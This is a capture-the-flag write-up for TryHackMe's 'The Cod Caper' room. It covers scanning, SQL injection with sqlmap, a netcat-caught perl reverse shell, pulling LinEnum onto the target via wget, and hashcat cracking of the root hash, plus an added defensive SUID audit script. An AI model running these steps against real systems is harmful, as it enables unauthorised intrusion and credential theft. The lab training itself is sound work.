The Cod Caper - Try Hack Me (Writeup)
Check out the room
https://tryhackme.com/room/thecodcaper
Task 2:
We'll run nmap against the target
#nmap -sV -A -p1-1000 -T4 <machine_ip>
Task 3:
As recommended we'll use gobuster; the link to the wordlist is given in the task
And don't forget to use the -x flag
#gobuster dir -u <target_url> -w /path/to/wordlist -x ".extension"
Here you have to check for the common file extensions, i.e. .html, .php, .txt
Task 4 :
We'll use sqlmap for further exploitation
After running it we'll get the username and password for the admin page.
Task 5:
In the previous task we found the login page, and using sqlmap we got the username and password. After a successful login we'll see a screen like this.
It is vulnerable to command execution.
Now we'll run nc on our system to catch the reverse shell from the target machine.
Payloads are given in the link provided in the description of the task
#nc -lnvp 4444
Here my machine will listen on port 4444 for the connection back from the target machine
Now we'll try the payloads one by one by running them in the command field shown in the above image
Before running a payload modify the IP address and port
Port will be 4444
IP address will be the one on the access page of THM (Internal Virtual IP address)
Luckily I got the reverse shell on running the first perl payload on this page
https://highon.coffee/blog/reverse-shell-cheat-sheet/
Now on further enumeration you'll find the password in a hidden directory.
You will find it at /var/hidden/pass by using the find command
#find / -name pass -type f 2>/dev/null
Task 6:
Step 1: Prepare the Script on Your Attack Machine
# mkdir linenum
# cd linenum/
LinEnum and its script can be found on GitHub
#wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
#python -m SimpleHTTPServer 4444
Step 2: Download the Script on the Target Machine
Log in to the target machine over SSH
#ssh pingu@<IP>
pingu@ubuntu$ cd /tmp
pingu@ubuntu$ wget <IP>:4444/LinEnum.sh
pingu@ubuntu$ ls -la
pingu@ubuntu$ chmod +x LinEnum.sh
pingu@ubuntu$ ls -la
pingu@ubuntu$ ./LinEnum.sh
Now look for the SUID files in the results.
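The SUID check that LinEnum reports is the same one a defender should run on a schedule. Added here as an example (not part of the original writeup or of LinEnum): a POSIX sh script that lists SUID/SGID files under a directory and flags any that are not in a known-good baseline file. The scan root and baseline path are assumptions passed in by the caller.

```shell
#!/bin/sh
# Added example: SUID/SGID drift audit against a known-good baseline.
# Assumes POSIX find, sort and comm; paths are chosen by the caller.

# List regular files under $1 that have the SUID (4000) or SGID (2000)
# bit set, one absolute path per line, sorted so comm can consume it.
list_suid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Print lines of the current scan file ($2) that are absent from the
# baseline file ($1). The baseline is sorted on the fly; the scan file
# must already be sorted (list_suid produces it that way).
suid_diff() {
    sort "$1" | comm -13 - "$2"
}

# Full audit: scan directory $1, compare with baseline $2.
# Returns 0 when nothing new was found, 1 when unexpected files exist.
audit_suid() {
    scan=$(mktemp)
    list_suid "$1" > "$scan"
    new=$(suid_diff "$2" "$scan")
    rm -f "$scan"
    if [ -n "$new" ]; then
        printf 'Unexpected SUID/SGID files:\n%s\n' "$new"
        return 1
    fi
    return 0
}
```

Record a baseline with `list_suid / > suid.baseline` on a freshly built host and run `audit_suid / suid.baseline` from cron; a non-zero exit is the signal to investigate.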
Task 10:
Now we have the hash to crack; here I have saved the given hash to a root.txt file
We'll use hashcat for cracking it
# hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt
On completing this we'll have the root password.
Thanks for reading